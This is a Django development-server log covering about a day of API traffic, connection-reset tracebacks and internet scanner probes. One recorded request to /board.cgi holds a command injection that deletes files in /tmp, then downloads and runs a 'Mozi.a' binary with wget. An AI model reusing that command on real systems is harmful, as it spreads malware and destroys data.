Not Found: /actuator/health
[11/Dec/2020 12:13:29] "GET /actuator/health HTTP/1.1" 404 2199
Not Found: /board.cgi
[11/Dec/2020 12:43:02] "GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron" 404 2312
Not Found: /http:/example.com/
[11/Dec/2020 14:55:44] "GET http://example.com/ HTTP/1.1" 404 1665
----------------------------------------
Exception happened during processing of request from ('39.108.106.59', 48240)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /users
[11/Dec/2020 15:24:11] "POST /users?page=&size=5 HTTP/1.1" 404 2187
Invalid HTTP_HOST header: ''. The domain name provided is not valid according to RFC 1034/1035.
Bad Request: /manager/html
[11/Dec/2020 16:13:33] "GET /manager/html HTTP/1.1" 400 61530
Not Found: /
[11/Dec/2020 16:42:49] "GET / HTTP/1.0" 404 2173
[11/Dec/2020 17:08:56] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[11/Dec/2020 17:08:56] "  /*à     Cookie: mstshash=Administr" 400 -
[11/Dec/2020 18:16:01] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[11/Dec/2020 18:16:01] "  /*à     Cookie: mstshash=Administr" 400 -
[11/Dec/2020 19:17:50] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[11/Dec/2020 19:17:50] "  /*à     Cookie: mstshash=Administr" 400 -
Not Found: /
[11/Dec/2020 19:42:19] "GET / HTTP/1.1" 404 2136
Not Found: /http:/example.com/
[11/Dec/2020 19:58:45] "GET http://example.com/ HTTP/1.1" 404 1665
[11/Dec/2020 20:12:09] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[11/Dec/2020 20:12:09] "  /*à     Cookie: mstshash=Administr" 400 -
[11/Dec/2020 21:04:28] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[11/Dec/2020 21:04:28] "  /*à     Cookie: mstshash=Administr" 400 -
Not Found: /
[11/Dec/2020 21:08:34] "GET / HTTP/1.1" 404 2136
Not Found: /favicon.ico
[11/Dec/2020 21:08:44] "GET /favicon.ico HTTP/1.1" 404 2187
Not Found: /robots.txt
[11/Dec/2020 21:08:45] "GET /robots.txt HTTP/1.1" 404 2184
Bad Request: /api/vi/ddobakis/
[11/Dec/2020 22:33:47] "POST /api/vi/ddobakis/ HTTP/1.1" 400 53
----------------------------------------
Exception happened during processing of request from ('211.36.137.119', 10757)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Bad Request: /api/vi/ddobakis/
[11/Dec/2020 22:35:24] "POST /api/vi/ddobakis/ HTTP/1.1" 400 53
Bad Request: /api/vi/ddobakis/
[11/Dec/2020 22:36:29] "POST /api/vi/ddobakis/ HTTP/1.1" 400 53
Bad Request: /api/vi/ddobakis/
[11/Dec/2020 22:40:33] "POST /api/vi/ddobakis/ HTTP/1.1" 400 53
----------------------------------------
Exception happened during processing of request from ('211.36.137.119', 34258)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Bad Request: /api/vi/ddobakis/
[11/Dec/2020 22:41:12] "POST /api/vi/ddobakis/ HTTP/1.1" 400 53
----------------------------------------
Exception happened during processing of request from ('211.36.137.119', 21571)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Bad Request: /api/vi/ddobakis/
[11/Dec/2020 22:42:35] "POST /api/vi/ddobakis/ HTTP/1.1" 400 53
----------------------------------------
Exception happened during processing of request from ('211.36.137.119', 23300)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Bad Request: /api/vi/ddobakis/
[11/Dec/2020 22:53:46] "POST /api/vi/ddobakis/ HTTP/1.1" 400 104
----------------------------------------
Exception happened during processing of request from ('211.36.137.119', 8721)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Bad Request: /api/vi/ddobakis/
[11/Dec/2020 22:54:37] "POST /api/vi/ddobakis/ HTTP/1.1" 400 104
----------------------------------------
Exception happened during processing of request from ('211.36.137.119', 10553)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Bad Request: /api/vi/ddobakis/
[11/Dec/2020 22:55:01] "POST /api/vi/ddobakis/ HTTP/1.1" 400 53
----------------------------------------
Exception happened during processing of request from ('211.36.137.119', 49225)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
[11/Dec/2020 22:58:49] "POST /api/vi/ddobakis/ HTTP/1.1" 201 193
[11/Dec/2020 23:05:24] "POST /api/vi/ddobakis/ HTTP/1.1" 201 193
----------------------------------------
Exception happened during processing of request from ('211.36.137.119', 31474)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
[11/Dec/2020 23:08:59] "POST /api/vi/ddobakis/ HTTP/1.1" 201 193
[11/Dec/2020 23:09:14] "POST /api/vi/ddobakis/ HTTP/1.1" 201 193
Bad Request: /api/vi/ddobakis/
[11/Dec/2020 23:37:35] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
----------------------------------------
Exception happened during processing of request from ('211.36.137.119', 53058)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /manager/text/list
[11/Dec/2020 23:54:06] "GET /manager/text/list HTTP/1.1" 404 2205
Bad Request: /api/vi/ddobakis/
[11/Dec/2020 23:56:29] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
[11/Dec/2020 23:57:59] "GET /api/vi/ddobakis/ HTTP/1.1" 200 91661
[11/Dec/2020 23:58:00] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.1" 200 121457
[11/Dec/2020 23:58:00] "GET /static/rest_framework/css/default.css HTTP/1.1" 304 0
[11/Dec/2020 23:58:00] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.1" 200 39680
[11/Dec/2020 23:58:00] "GET /static/rest_framework/css/prettify.css HTTP/1.1" 304 0
[11/Dec/2020 23:58:00] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.1" 304 0
[11/Dec/2020 23:58:00] "GET /static/rest_framework/js/default.js HTTP/1.1" 200 1268
[11/Dec/2020 23:58:00] "GET /static/rest_framework/js/ajax-form.js HTTP/1.1" 304 0
[11/Dec/2020 23:58:00] "GET /static/rest_framework/js/jquery-3.5.1.min.js HTTP/1.1" 304 0
[11/Dec/2020 23:58:00] "GET /static/rest_framework/js/prettify-min.js HTTP/1.1" 304 0
[11/Dec/2020 23:58:00] "GET /static/rest_framework/js/csrf.js HTTP/1.1" 304 0
[11/Dec/2020 23:58:00] "GET /static/rest_framework/img/grid.png HTTP/1.1" 304 0
[11/Dec/2020 23:58:27] "POST /api/vi/ddobakis/ HTTP/1.1" 201 192
Bad Request: /api/vi/ddobakis/
[11/Dec/2020 23:59:01] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
[11/Dec/2020 23:59:11] "GET /api/vi/ddobakis/ HTTP/1.1" 200 92156
[11/Dec/2020 23:59:32] "POST /api/vi/ddobakis/ HTTP/1.1" 201 195
[11/Dec/2020 23:59:35] "GET /api/vi/ddobakis/ HTTP/1.1" 200 92654
[12/Dec/2020 00:00:31] "POST /api/vi/ddobakis/ HTTP/1.1" 201 193
[12/Dec/2020 00:01:25] "POST /api/vi/ddobakis/ HTTP/1.1" 201 193
[12/Dec/2020 00:01:39] "POST /api/vi/ddobakis/ HTTP/1.1" 201 193
----------------------------------------
Exception happened during processing of request from ('211.36.137.119', 15800)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
[12/Dec/2020 00:06:44] "POST /api/vi/ddobakis/ HTTP/1.1" 201 193
[12/Dec/2020 00:07:11] "POST /api/vi/ddobakis/ HTTP/1.1" 201 193
[12/Dec/2020 00:10:11] "POST /api/vi/ddobakis/ HTTP/1.1" 201 193
Bad Request: /api/vi/ddobakis/
[12/Dec/2020 00:15:47] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
[12/Dec/2020 00:17:33] "POST /api/vi/ddobakis/ HTTP/1.1" 201 197
----------------------------------------
Exception happened during processing of request from ('211.36.137.119', 6135)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Bad Request: /api/vi/ddobakis/
[12/Dec/2020 00:21:22] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
[12/Dec/2020 00:24:01] "POST /api/vi/ddobakis/ HTTP/1.1" 201 204
[12/Dec/2020 00:24:24] "POST /api/vi/ddobakis/ HTTP/1.1" 201 197
[12/Dec/2020 00:24:36] "POST /api/vi/ddobakis/ HTTP/1.1" 201 204
[12/Dec/2020 00:25:03] "POST /api/vi/ddobakis/ HTTP/1.1" 201 193
----------------------------------------
Exception happened during processing of request from ('211.36.137.119', 8500)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Bad Request: /api/vi/ddobakis/
[12/Dec/2020 00:27:35] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
[12/Dec/2020 00:32:58] "POST /api/vi/ddobakis/ HTTP/1.1" 201 192
----------------------------------------
Exception happened during processing of request from ('211.36.137.119', 26663)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /
[12/Dec/2020 00:35:50] "GET / HTTP/1.1" 404 2131
Bad Request: /api/vi/ddobakis/
[12/Dec/2020 00:36:10] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
[12/Dec/2020 00:36:55] "POST /api/vi/ddobakis/ HTTP/1.1" 201 192
[12/Dec/2020 00:37:11] "POST /api/vi/ddobakis/ HTTP/1.1" 201 204
[12/Dec/2020 00:37:19] "POST /api/vi/ddobakis/ HTTP/1.1" 201 193
Bad Request: /api/vi/ddobakis/
[12/Dec/2020 00:37:47] "POST /api/vi/ddobakis/ HTTP/1.1" 400 53
Bad Request: /api/vi/ddobakis/
[12/Dec/2020 00:37:51] "POST /api/vi/ddobakis/ HTTP/1.1" 400 53
Bad Request: /api/vi/ddobakis/
[12/Dec/2020 00:37:57] "POST /api/vi/ddobakis/ HTTP/1.1" 400 53
Bad Request: /api/vi/ddobakis/
[12/Dec/2020 00:37:58] "POST /api/vi/ddobakis/ HTTP/1.1" 400 53
Bad Request: /api/vi/ddobakis/
[12/Dec/2020 00:37:59] "POST /api/vi/ddobakis/ HTTP/1.1" 400 53
Bad Request: /api/vi/ddobakis/
[12/Dec/2020 00:38:00] "POST /api/vi/ddobakis/ HTTP/1.1" 400 53
Bad Request: /api/vi/ddobakis/
[12/Dec/2020 00:38:16] "POST /api/vi/ddobakis/ HTTP/1.1" 400 53
Bad Request: /api/vi/ddobakis/
[12/Dec/2020 00:45:11] "POST /api/vi/ddobakis/ HTTP/1.1" 400 53
[12/Dec/2020 00:52:22] "POST /api/vi/ddobakis/ HTTP/1.1" 201 194
Not Found: /manager/html
[12/Dec/2020 01:22:53] "GET /manager/html HTTP/1.1" 404 2190
[12/Dec/2020 02:08:59] "POST /api/vi/ddobakis/ HTTP/1.1" 201 193
Bad Request: /api/vi/ddobakis/
[12/Dec/2020 02:50:47] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
----------------------------------------
Exception happened during processing of request from ('211.36.137.119', 48064)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('37.9.13.92', 37842)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Bad Request: /api/vi/ddobakis/
[12/Dec/2020 03:01:03] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
[12/Dec/2020 03:02:19] "POST /api/vi/ddobakis/ HTTP/1.1" 201 193
Bad Request: /api/vi/ddobakis/
[12/Dec/2020 03:15:56] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[12/Dec/2020 03:17:39] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
[12/Dec/2020 03:19:27] "POST /api/vi/ddobakis/ HTTP/1.1" 201 193
[12/Dec/2020 03:19:46] "POST /api/vi/ddobakis/ HTTP/1.1" 201 193
----------------------------------------
Exception happened during processing of request from ('211.36.137.119', 50799)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
[12/Dec/2020 03:21:10] "POST /api/vi/ddobakis/ HTTP/1.1" 201 193
----------------------------------------
Exception happened during processing of request from ('211.36.137.119', 7718)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
[12/Dec/2020 03:23:29] "POST /api/vi/ddobakis/ HTTP/1.1" 201 193
Bad Request: /api/vi/ddobakis/
[12/Dec/2020 03:23:55] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
----------------------------------------
Exception happened during processing of request from ('211.36.137.119', 22039)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Bad Request: /api/vi/ddobakis/
[12/Dec/2020 03:28:53] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
[12/Dec/2020 03:29:12] "POST /api/vi/ddobakis/ HTTP/1.1" 201 193
[12/Dec/2020 03:30:52] "POST /api/vi/ddobakis/ HTTP/1.1" 201 192
----------------------------------------
Exception happened during processing of request from ('211.36.137.119', 4349)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Bad Request: /api/vi/ddobakis/
[12/Dec/2020 03:32:34] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Not Found: /
[12/Dec/2020 04:51:40] "GET / HTTP/1.1" 404 2136
Not Found: /
[12/Dec/2020 05:08:31] "GET / HTTP/1.1" 404 2136
[12/Dec/2020 06:50:44] code 400, message Bad HTTP/0.9 request type ('\x16\x03\x01\x00\x89\x01\x00\x00')
[12/Dec/2020 06:50:44] You're accessing the development server over HTTPS, but it only supports HTTP.

Not Found: /
[12/Dec/2020 07:27:10] "GET / HTTP/1.0" 404 2173
Not Found: /
[12/Dec/2020 07:32:02] "GET / HTTP/1.1" 404 2136
Not Found: /
[12/Dec/2020 08:01:08] "GET / HTTP/1.1" 404 2136
Not Found: /hudson
[12/Dec/2020 11:20:42] "GET /hudson HTTP/1.1" 404 2172
Not Found: /
[12/Dec/2020 11:34:35] "GET / HTTP/1.1" 404 2136
Bad Request: /api/vi/ddobakis/
[12/Dec/2020 11:57:55] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Not Found: /
[12/Dec/2020 12:32:24] "GET / HTTP/1.1" 404 2136
Bad Request: /api/vi/ddobakis/
[12/Dec/2020 12:43:32] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[12/Dec/2020 12:43:43] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
[12/Dec/2020 12:44:03] "POST /api/vi/ddobakis/ HTTP/1.1" 201 193
[12/Dec/2020 12:44:18] "POST /api/vi/ddobakis/ HTTP/1.1" 201 192
[12/Dec/2020 12:44:55] "POST /api/vi/ddobakis/ HTTP/1.1" 201 193
----------------------------------------
Exception happened during processing of request from ('112.152.69.155', 63031)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Bad Request: /api/vi/ddobakis/
[12/Dec/2020 12:50:23] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
[12/Dec/2020 12:50:37] "POST /api/vi/ddobakis/ HTTP/1.1" 201 193
----------------------------------------
Exception happened during processing of request from ('112.152.69.155', 63039)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
